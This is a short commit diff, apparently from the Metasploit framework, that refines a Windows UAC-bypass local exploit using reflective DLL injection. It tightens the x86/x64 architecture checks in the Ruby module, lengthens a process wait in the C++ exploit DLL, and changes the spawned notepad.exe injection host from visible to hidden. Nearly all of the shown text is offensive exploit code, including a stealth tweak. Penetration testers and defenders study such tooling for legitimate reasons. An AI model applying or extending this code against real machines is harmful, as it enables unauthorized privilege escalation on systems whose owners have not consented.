Better arch checking

2013-09-27 09:39:29 +01:00 · 2013-09-27 09:39:29 +01:00 · c3c07b5fd7
parent dfac7b57d2
commit c3c07b5fd7
2 changed files with 5 additions and 5 deletions
--- a/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp
+++ b/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp
@ -72,7 +72,7 @@ void exploit()

 								if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
 								{
-									WaitForSingleObject(shinfo.hProcess, 50);
+									WaitForSingleObject(shinfo.hProcess, 200);
 									TerminateProcess(shinfo.hProcess, 0); // Even better if the template payload.dll calls ExitProcess
 									CloseHandle(shinfo.hProcess);
 								}
--- a/modules/exploits/windows/local/bypassuac_injection.rb
+++ b/modules/exploits/windows/local/bypassuac_injection.rb
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Local
        has the UAC flag turned off. This module uses the Reflective DLL Injection
        technique to drop only the DLL payload binary instead of three seperate
        binaries in the standard technique. However, it requires the correct
-        architecture to be selected.
+        architecture to be selected, (use x64 for SYSWOW64 systems also).
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Local
    # decide, x86 or x64
    sysarch = sysinfo["Architecture"]
    if sysarch =~ /x64/i
-      unless target_arch.first == 'x86_64'
+      unless(target_arch.first =~ /64/i) and (datastore['PAYLOAD'] =~ /64/i)
        fail_with(
            Exploit::Failure::BadConfig,
            "x86 Target Selected for x64 System"
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local
        register_files_for_cleanup("#{windir}\\System32\\sysprep\\CRYPTBASE.dll")
      end
    else
-      if target_arch.first =~ /x64/i
+      if (target_arch.first =~ /64/i) or (datastore['PAYLOAD'] =~ /64/i)
        fail_with(
            Exploit::Failure::BadConfig,
            "x64 Target Selected for x86 System"
@ -175,7 +175,7 @@ class Metasploit3 < Msf::Exploit::Local
    print_status("Spawning process with Windows Publisher Certificate, to inject into...")

    cmd = "#{windir}\\System32\\notepad.exe"
-    proc = client.sys.process.execute(cmd, nil, {'Hidden' => false })
+    proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })

    if proc.nil? or proc.pid.nil?
      fail_with(Exploit::Failure::Unknown, "Spawning Process failed...")